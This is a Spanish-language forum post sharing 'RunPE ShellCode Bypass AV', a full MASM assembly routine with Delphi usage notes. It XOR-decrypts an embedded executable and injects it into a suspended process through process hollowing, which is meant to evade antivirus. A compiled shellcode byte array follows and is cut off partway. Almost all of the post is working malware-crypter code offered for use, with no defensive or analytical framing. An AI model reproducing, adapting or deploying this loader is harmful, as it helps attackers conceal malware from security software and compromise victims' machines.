
RunPE NASM


Desconectado ragaza

« en: Abril 04, 2018, 06:01:24 am »
Código:
.386
.model flat,stdcall
 
Comment *
 
[ RunPE ShellCode Bypass AV ] - {Private}
 
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
 
[ 2010 - 2011 ]
 
[Skype : coldzer01 ] - [Yahoo : web.ghost@yahoo.com ]
 
[ Home : www.at4re.com  - www.mtcoders.com ]
 
{
Usage : [Delphi]
 
Make Var with
 
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
 
#### then in code call it like this #########
 
 Begin
        RunPE := @ShellCode[1];
        RunPE(@TextFile[1],length(TextFile));
 end;
 
}
*
 
.code
 
start:
  PUSH EBP
  MOV EBP,ESP
  ADD ESP,-0378h
  PUSH EBX
  PUSH ESI
  PUSH EDI
 
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
 
;################# Extract Module Name [UNICODE] #################### 
  TEST EAX,EAX
AG: 
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,00h
  JE OK
  INC EAX
  INC EAX
  JMP AG
OK: 
  DEC EAX
  DEC EAX
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,5Ch ; '\'
  JE OK2
  JMP OK
OK2: 
  INC EAX
  INC EAX 
;################# Extract Module Name #################### 


;################# Convert to UpperCase ####################
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h                                     
JS CHK 
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
CMP CX,0
JNE UP
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase ####################


;################# Check Module Name [Kernel32 [UNICODE]] ######################
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh                                      ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h                                     ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh                                     ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]     
CMP ECX,4Ch                                     ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h                                     ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h                                     ; 2
JNZ AV
;********* Normal Mode *******
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+18h]
  JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
AV:
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
  MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
  MOV EAX,DWORD PTR DS:[EAX+18h] 
;################# Check Module Name ######################
GO:     
  MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
  MOV BYTE PTR SS:[EBP-28h],47h
  MOV BYTE PTR SS:[EBP-27h],50h
  MOV BYTE PTR SS:[EBP-26h],41h
  XOR EAX,EAX
  MOV DWORD PTR SS:[EBP-14h],EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOV EDX,DWORD PTR DS:[EAX+78h]
  MOV DWORD PTR SS:[EBP-44h],EDX
  MOV EDX,DWORD PTR DS:[EAX+7Ch]
  MOV DWORD PTR SS:[EBP-40h],EDX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  ADD EAX,DWORD PTR SS:[EBP-44h]
  MOV ESI,DWORD PTR DS:[EAX+18h]
  DEC ESI
  TEST ESI,ESI
  JB LoadAPI
  INC ESI
  XOR EDX,EDX
LoopAPI:
  MOV ECX,DWORD PTR DS:[EAX+20h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  SHL EBX,2h
  ADD ECX,EBX
  MOV EDI,DWORD PTR DS:[ECX+0Ch]
  ADD EDI,DWORD PTR SS:[EBP-4h]
  MOV BL,BYTE PTR DS:[EDI]
  CMP BL,BYTE PTR SS:[EBP-28h]
  JNZ CheckAPI
  MOV BL,BYTE PTR DS:[EDI+3h]
  CMP BL,BYTE PTR SS:[EBP-27h]
  JNZ CheckAPI
  MOV CL,BYTE PTR DS:[EDI+7h]
  CMP CL,BYTE PTR SS:[EBP-26h]
  JNZ CheckAPI
  MOV ECX,DWORD PTR DS:[EAX+24h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  ADD EBX,EBX
  ADD ECX,EBX
  MOV CX,WORD PTR DS:[ECX]
  ADD CX,3h
  MOV EAX,DWORD PTR DS:[EAX+1Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOVZX ECX,CX
  SHL ECX,2h
  ADD EAX,ECX
  MOV ESI,DWORD PTR DS:[EAX]
  ADD ESI,DWORD PTR SS:[EBP-4h]
  MOV DWORD PTR SS:[EBP-14h],ESI
  JMP LoadAPI
CheckAPI:
  INC EDX
  DEC ESI
  JNZ LoopAPI
LoadAPI:                                                ; [ Write API To An Pointer - use later ]
  MOV BYTE PTR SS:[EBP-69h],47h 
  MOV BYTE PTR SS:[EBP-68h],65h
  MOV BYTE PTR SS:[EBP-67h],74h
  MOV BYTE PTR SS:[EBP-66h],4Dh
  MOV BYTE PTR SS:[EBP-65h],6Fh
  MOV BYTE PTR SS:[EBP-64h],64h
  MOV BYTE PTR SS:[EBP-63h],75h
  MOV BYTE PTR SS:[EBP-62h],6Ch
  MOV BYTE PTR SS:[EBP-61h],65h
  MOV BYTE PTR SS:[EBP-60h],48h
  MOV BYTE PTR SS:[EBP-5Fh],61h
  MOV BYTE PTR SS:[EBP-5Eh],6Eh
  MOV BYTE PTR SS:[EBP-5Dh],64h
  MOV BYTE PTR SS:[EBP-5Ch],6Ch
  MOV BYTE PTR SS:[EBP-5Bh],65h
  MOV BYTE PTR SS:[EBP-5Ah],41h
  MOV BYTE PTR SS:[EBP-59h],0h
  MOV BYTE PTR SS:[EBP-7Ch],47h
  MOV BYTE PTR SS:[EBP-7Bh],65h
  MOV BYTE PTR SS:[EBP-7Ah],74h
  MOV BYTE PTR SS:[EBP-79h],4Dh
  MOV BYTE PTR SS:[EBP-78h],6Fh
  MOV BYTE PTR SS:[EBP-77h],64h
  MOV BYTE PTR SS:[EBP-76h],75h
  MOV BYTE PTR SS:[EBP-75h],6Ch
  MOV BYTE PTR SS:[EBP-74h],65h
  MOV BYTE PTR SS:[EBP-73h],46h
  MOV BYTE PTR SS:[EBP-72h],69h
  MOV BYTE PTR SS:[EBP-71h],6Ch
  MOV BYTE PTR SS:[EBP-70h],65h
  MOV BYTE PTR SS:[EBP-6Fh],4Eh
  MOV BYTE PTR SS:[EBP-6Eh],61h
  MOV BYTE PTR SS:[EBP-6Dh],6Dh
  MOV BYTE PTR SS:[EBP-6Ch],65h
  MOV BYTE PTR SS:[EBP-6Bh],41h
  MOV BYTE PTR SS:[EBP-6Ah],0h
  MOV BYTE PTR SS:[EBP-91h],5Ah
  MOV BYTE PTR SS:[EBP-90h],77h
  MOV BYTE PTR SS:[EBP-8Fh],55h
  MOV BYTE PTR SS:[EBP-8Eh],6Eh
  MOV BYTE PTR SS:[EBP-8Dh],6Dh
  MOV BYTE PTR SS:[EBP-8Ch],61h
  MOV BYTE PTR SS:[EBP-8Bh],70h
  MOV BYTE PTR SS:[EBP-8Ah],56h
  MOV BYTE PTR SS:[EBP-89h],69h
  MOV BYTE PTR SS:[EBP-88h],65h
  MOV BYTE PTR SS:[EBP-87h],77h
  MOV BYTE PTR SS:[EBP-86h],4Fh
  MOV BYTE PTR SS:[EBP-85h],66h
  MOV BYTE PTR SS:[EBP-84h],53h
  MOV BYTE PTR SS:[EBP-83h],65h
  MOV BYTE PTR SS:[EBP-82h],63h
  MOV BYTE PTR SS:[EBP-81h],74h
  MOV BYTE PTR SS:[EBP-80h],69h
  MOV BYTE PTR SS:[EBP-7Fh],6Fh
  MOV BYTE PTR SS:[EBP-7Eh],6Eh
  MOV BYTE PTR SS:[EBP-7Dh],0h
  MOV BYTE PTR SS:[EBP-0A0h],56h
  MOV BYTE PTR SS:[EBP-9Fh],69h
  MOV BYTE PTR SS:[EBP-9Eh],72h
  MOV BYTE PTR SS:[EBP-9Dh],74h
  MOV BYTE PTR SS:[EBP-9Ch],75h
  MOV BYTE PTR SS:[EBP-9Bh],61h
  MOV BYTE PTR SS:[EBP-9Ah],6Ch
  MOV BYTE PTR SS:[EBP-99h],41h
  MOV BYTE PTR SS:[EBP-98h],6Ch
  MOV BYTE PTR SS:[EBP-97h],6Ch
  MOV BYTE PTR SS:[EBP-96h],6Fh
  MOV BYTE PTR SS:[EBP-95h],63h
  MOV BYTE PTR SS:[EBP-94h],45h
  MOV BYTE PTR SS:[EBP-93h],78h
  MOV BYTE PTR SS:[EBP-92h],0h
  MOV BYTE PTR SS:[EBP-0B1h],56h
  MOV BYTE PTR SS:[EBP-0B0h],69h
  MOV BYTE PTR SS:[EBP-0AFh],72h
  MOV BYTE PTR SS:[EBP-0AEh],74h
  MOV BYTE PTR SS:[EBP-0ADh],75h
  MOV BYTE PTR SS:[EBP-0ACh],61h
  MOV BYTE PTR SS:[EBP-0ABh],6Ch
  MOV BYTE PTR SS:[EBP-0AAh],50h
  MOV BYTE PTR SS:[EBP-0A9h],72h
  MOV BYTE PTR SS:[EBP-0A8h],6Fh
  MOV BYTE PTR SS:[EBP-0A7h],74h
  MOV BYTE PTR SS:[EBP-0A6h],65h
  MOV BYTE PTR SS:[EBP-0A5h],63h
  MOV BYTE PTR SS:[EBP-0A4h],74h
  MOV BYTE PTR SS:[EBP-0A3h],45h
  MOV BYTE PTR SS:[EBP-0A2h],78h
  MOV BYTE PTR SS:[EBP-0A1h],0h
  MOV BYTE PTR SS:[EBP-0C3h],52h
  MOV BYTE PTR SS:[EBP-0C2h],65h
  MOV BYTE PTR SS:[EBP-0C1h],61h
  MOV BYTE PTR SS:[EBP-0C0h],64h
  MOV BYTE PTR SS:[EBP-0BFh],50h
  MOV BYTE PTR SS:[EBP-0BEh],72h
  MOV BYTE PTR SS:[EBP-0BDh],6Fh
  MOV BYTE PTR SS:[EBP-0BCh],63h
  MOV BYTE PTR SS:[EBP-0BBh],65h
  MOV BYTE PTR SS:[EBP-0BAh],73h
  MOV BYTE PTR SS:[EBP-0B9h],73h
  MOV BYTE PTR SS:[EBP-0B8h],4Dh
  MOV BYTE PTR SS:[EBP-0B7h],65h
  MOV BYTE PTR SS:[EBP-0B6h],6Dh
  MOV BYTE PTR SS:[EBP-0B5h],6Fh
  MOV BYTE PTR SS:[EBP-0B4h],72h
  MOV BYTE PTR SS:[EBP-0B3h],79h
  MOV BYTE PTR SS:[EBP-0B2h],0h
  MOV BYTE PTR SS:[EBP-0D6h],57h
  MOV BYTE PTR SS:[EBP-0D5h],72h
  MOV BYTE PTR SS:[EBP-0D4h],69h
  MOV BYTE PTR SS:[EBP-0D3h],74h
  MOV BYTE PTR SS:[EBP-0D2h],65h
  MOV BYTE PTR SS:[EBP-0D1h],50h
  MOV BYTE PTR SS:[EBP-0D0h],72h
  MOV BYTE PTR SS:[EBP-0CFh],6Fh
  MOV BYTE PTR SS:[EBP-0CEh],63h
  MOV BYTE PTR SS:[EBP-0CDh],65h
  MOV BYTE PTR SS:[EBP-0CCh],73h
  MOV BYTE PTR SS:[EBP-0CBh],73h
  MOV BYTE PTR SS:[EBP-0CAh],4Dh
  MOV BYTE PTR SS:[EBP-0C9h],65h
  MOV BYTE PTR SS:[EBP-0C8h],6Dh
  MOV BYTE PTR SS:[EBP-0C7h],6Fh
  MOV BYTE PTR SS:[EBP-0C6h],72h
  MOV BYTE PTR SS:[EBP-0C5h],79h
  MOV BYTE PTR SS:[EBP-0C4h],0h
  MOV BYTE PTR SS:[EBP-0E7h],47h
  MOV BYTE PTR SS:[EBP-0E6h],65h
  MOV BYTE PTR SS:[EBP-0E5h],74h
  MOV BYTE PTR SS:[EBP-0E4h],54h
  MOV BYTE PTR SS:[EBP-0E3h],68h
  MOV BYTE PTR SS:[EBP-0E2h],72h
  MOV BYTE PTR SS:[EBP-0E1h],65h
  MOV BYTE PTR SS:[EBP-0E0h],61h
  MOV BYTE PTR SS:[EBP-0DFh],64h
  MOV BYTE PTR SS:[EBP-0DEh],43h
  MOV BYTE PTR SS:[EBP-0DDh],6Fh
  MOV BYTE PTR SS:[EBP-0DCh],6Eh
  MOV BYTE PTR SS:[EBP-0DBh],74h
  MOV BYTE PTR SS:[EBP-0DAh],65h
  MOV BYTE PTR SS:[EBP-0D9h],78h
  MOV BYTE PTR SS:[EBP-0D8h],74h
  MOV BYTE PTR SS:[EBP-0D7h],0h
  MOV BYTE PTR SS:[EBP-0F8h],53h
  MOV BYTE PTR SS:[EBP-0F7h],65h
  MOV BYTE PTR SS:[EBP-0F6h],74h
  MOV BYTE PTR SS:[EBP-0F5h],54h
  MOV BYTE PTR SS:[EBP-0F4h],68h
  MOV BYTE PTR SS:[EBP-0F3h],72h
  MOV BYTE PTR SS:[EBP-0F2h],65h
  MOV BYTE PTR SS:[EBP-0F1h],61h
  MOV BYTE PTR SS:[EBP-0F0h],64h
  MOV BYTE PTR SS:[EBP-0EFh],43h
  MOV BYTE PTR SS:[EBP-0EEh],6Fh
  MOV BYTE PTR SS:[EBP-0EDh],6Eh
  MOV BYTE PTR SS:[EBP-0ECh],74h
  MOV BYTE PTR SS:[EBP-0EBh],65h
  MOV BYTE PTR SS:[EBP-0EAh],78h
  MOV BYTE PTR SS:[EBP-0E9h],74h
  MOV BYTE PTR SS:[EBP-0E8h],0h
  MOV BYTE PTR SS:[EBP-0105h],52h
  MOV BYTE PTR SS:[EBP-0104h],65h
  MOV BYTE PTR SS:[EBP-0103h],73h
  MOV BYTE PTR SS:[EBP-0102h],75h
  MOV BYTE PTR SS:[EBP-0101h],6Dh
  MOV BYTE PTR SS:[EBP-0100h],65h
  MOV BYTE PTR SS:[EBP-0FFh],54h
  MOV BYTE PTR SS:[EBP-0FEh],68h
  MOV BYTE PTR SS:[EBP-0FDh],72h
  MOV BYTE PTR SS:[EBP-0FCh],65h
  MOV BYTE PTR SS:[EBP-0FBh],61h
  MOV BYTE PTR SS:[EBP-0FAh],64h
  MOV BYTE PTR SS:[EBP-0F9h],0h
  MOV BYTE PTR SS:[EBP-01Eh],6Eh
  MOV BYTE PTR SS:[EBP-01Dh],74h
  MOV BYTE PTR SS:[EBP-01Ch],64h
  MOV BYTE PTR SS:[EBP-01Bh],6Ch
  MOV BYTE PTR SS:[EBP-01Ah],6Ch
  MOV BYTE PTR SS:[EBP-019h],0h
  MOV BYTE PTR SS:[EBP-0114h],43h
  MOV BYTE PTR SS:[EBP-0113h],72h
  MOV BYTE PTR SS:[EBP-0112h],65h
  MOV BYTE PTR SS:[EBP-0111h],61h
  MOV BYTE PTR SS:[EBP-0110h],74h
  MOV BYTE PTR SS:[EBP-010Fh],65h
  MOV BYTE PTR SS:[EBP-010Eh],50h
  MOV BYTE PTR SS:[EBP-010Dh],72h
  MOV BYTE PTR SS:[EBP-010Ch],6Fh
  MOV BYTE PTR SS:[EBP-010Bh],63h
  MOV BYTE PTR SS:[EBP-010Ah],65h
  MOV BYTE PTR SS:[EBP-109h],73h
  MOV BYTE PTR SS:[EBP-108h],73h
  MOV BYTE PTR SS:[EBP-107h],41h
  MOV BYTE PTR SS:[EBP-0106h],0h
  MOV BYTE PTR SS:[EBP-121h],4Ch
  MOV BYTE PTR SS:[EBP-120h],6Fh
  MOV BYTE PTR SS:[EBP-11Fh],61h
  MOV BYTE PTR SS:[EBP-11Eh],64h
  MOV BYTE PTR SS:[EBP-11Dh],4Ch
  MOV BYTE PTR SS:[EBP-11Ch],69h
  MOV BYTE PTR SS:[EBP-11Bh],62h
  MOV BYTE PTR SS:[EBP-11Ah],72h
  MOV BYTE PTR SS:[EBP-119h],61h
  MOV BYTE PTR SS:[EBP-118h],72h
  MOV BYTE PTR SS:[EBP-117h],79h
  MOV BYTE PTR SS:[EBP-116h],41h
  MOV BYTE PTR SS:[EBP-115h],0h
  LEA EAX,DWORD PTR SS:[EBP-121h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-18h],EAX
  MOV ESI,DWORD PTR SS:[EBP+0Ch]
  DEC ESI
  TEST ESI,ESI
  JL CheckLen
  INC ESI
  XOR EBX,EBX
DeCryptPE:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV AL,BYTE PTR DS:[EAX+EBX]
  XOR AL,2Ah                                            ; XOR Key 1       [ You Can Change It But Should Crypt the File with the New Keys ]
  XOR AL,87h                                            ; XOR Key 2
  MOV EDX,DWORD PTR SS:[EBP+8h]
  MOV BYTE PTR DS:[EDX+EBX],AL
  INC EBX
  DEC ESI
  JNZ DeCryptPE
CheckLen:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV DWORD PTR SS:[EBP-54h],EAX
  LEA EAX,DWORD PTR SS:[EBP-69h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-7Ch]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV ESI,EAX
  PUSH 105
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0h
  CALL EBX
  PUSH EAX
  CALL ESI
  LEA EAX,DWORD PTR SS:[EBP-184h]
  MOV EBX,43h
GetS4C:
  MOV BYTE PTR DS:[EAX+EBX],0h
  DEC EBX
  CMP EBX,-1h
  JNZ GetS4C
  MOV DWORD PTR SS:[EBP-184h],44h
  LEA EAX,DWORD PTR SS:[EBP-114h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-184h]
  PUSH EAX
  PUSH 0h
  PUSH 0h
  PUSH 4h
  PUSH 0h
  PUSH 0h
  PUSH 0h
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0E7h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV DWORD PTR SS:[EBP-250h],10007h
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0C3h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-30h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-91h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-1Eh]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-18h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  MOV DWORD PTR SS:[EBP-2Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-0A0h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  PUSH 40h
  PUSH 3000h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+50h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV DWORD PTR SS:[EBP-38h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0D6h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-0Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  LEA EDI,DWORD PTR DS:[EAX+18h]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX EAX,WORD PTR DS:[EAX+14h]
  ADD EDI,EAX
  LEA EAX,DWORD PTR SS:[EBP-0B1h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-8h],EAX
  MOV DWORD PTR SS:[EBP-270h],1h
  MOV DWORD PTR SS:[EBP-26Ch],10h
  MOV DWORD PTR SS:[EBP-268h],2h
  MOV DWORD PTR SS:[EBP-264h],20h
  MOV DWORD PTR SS:[EBP-260h],4h
  MOV DWORD PTR SS:[EBP-25Ch],40h
  MOV DWORD PTR SS:[EBP-258h],4h
  MOV DWORD PTR SS:[EBP-254h],40h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX ESI,WORD PTR DS:[EAX+6h]
  DEC ESI
  TEST ESI,ESI
  JL CheckReadP
  INC ESI
  XOR EBX,EBX
ReadRPLoop:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  LEA EAX,DWORD PTR SS:[EBP-3Ch]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
  SHR EAX,1Dh
  MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-8h]
  INC EBX
  DEC ESI
  JNZ ReadRPLoop
CheckReadP:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+28h]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  MOV DWORD PTR SS:[EBP-1A0h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0F8h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-105h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  POP EDI
  POP ESI
  POP EBX
  MOV ESP,EBP
  POP EBP
  RETN 8h
end start

Código en shellcode:
NewRunPE {Bypass AV} : array [0..2376] of Byte =
(
$55,$8B,$EC,$81,$C4,$88,$FC,$FF,$FF,$53,$56,$57,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,
$00,$8B,$00,$8B,$40,$28,$85,$C0,$66,$8B,$08,$66,$83,$F9,$00,$74,$04,$40,$40,$EB,$F3,$48,$48,$66,$8B,
$08,$66,$83,$F9,$5C,$74,$02,$EB,$F3,$40,$40,$66,$8B,$08,$66,$83,$F9,$4B,$75,$54,$66,$8B,$48,$02,$83,
$F9,$45,$75,$4B,$66,$8B,$48,$04,$83,$F9,$52,$75,$42,$66,$8B,$48,$06,$83,$F9,$4E,$75,$39,$66,$8B,$48,
$08,$83,$F9,$45,$75,$30,$66,$8B,$48,$0A,$83,$F9,$4C,$75,$27,$66,$8B,$48,$0C,$83,$F9,$33,$75,$1E,$66,
$8B,$48,$0E,$83,$F9,$32,$75,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,
$40,$18,$EB,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$00,$8B,$40,$18,
$89,$45,$FC,$C6,$45,$D8,$47,$C6,$45,$D9,$50,$C6,$45,$DA,$41,$33,$C0,$89,$45,$EC,$8B,$45,$FC,$8B,$40,
$3C,$03,$45,$FC,$8B,$50,$78,$89,$55,$BC,$8B,$50,$7C,$89,$55,$C0,$8B,$45,$FC,$03,$45,$BC,$8B,$70,$18,
$4E,$85,$F6,$72,$5C,$46,$33,$D2,$8B,$48,$20,$03,$4D,$FC,$8B,$DA,$C1,$E3,$02,$03,$CB,$8B,$79,$0C,$03,
$7D,$FC,$8A,$1F,$3A,$5D,$D8,$75,$3B,$8A,$5F,$03,$3A,$5D,$D9,$75,$33,$8A,$4F,$07,$3A,$4D,$DA,$75,$2B,
$8B,$48,$24,$03,$4D,$FC,$8B,$DA,$03,$DB,$03,$CB,$66,$8B,$09,$66,$83,$C1,$03,$8B,$40,$1C,$03,$45,$FC,
$0F,$B7,$C9,$C1,$E1,$02,$03,$C1,$8B,$30,$03,$75,$FC,$89,$75,$EC,$EB,$04,$42,$4E,$75,$A7,$C6,$45,$97,
$47,$C6,$45,$98,$65,$C6,$45,$99,$74,$C6,$45,$9A,$4D,$C6,$45,$9B,$6F,$C6,$45,$9C,$64,$C6,$45,$9D,$75,
$C6,$45,$9E,$6C,$C6,$45,$9F,$65,$C6,$45,$A0,$48,$C6,$45,$A1,$61,$C6,$45,$A2,$6E,$C6,$45,$A3,$64,$C6,
$45,$A4,$6C,$C6,$45,$A5,$65,$C6,$45,$A6,$41,$C6,$45,$A7,$00,$C6,$45,$84,$47,$C6,$45,$85,$65,$C6,$45,
$86,$74,$C6,$45,$87,$4D,$C6,$45,$88,$6F,$C6,$45,$89,$64,$C6,$45,$8A,$75,$C6,$45,$8B,$6C,$C6,$45,$8C,
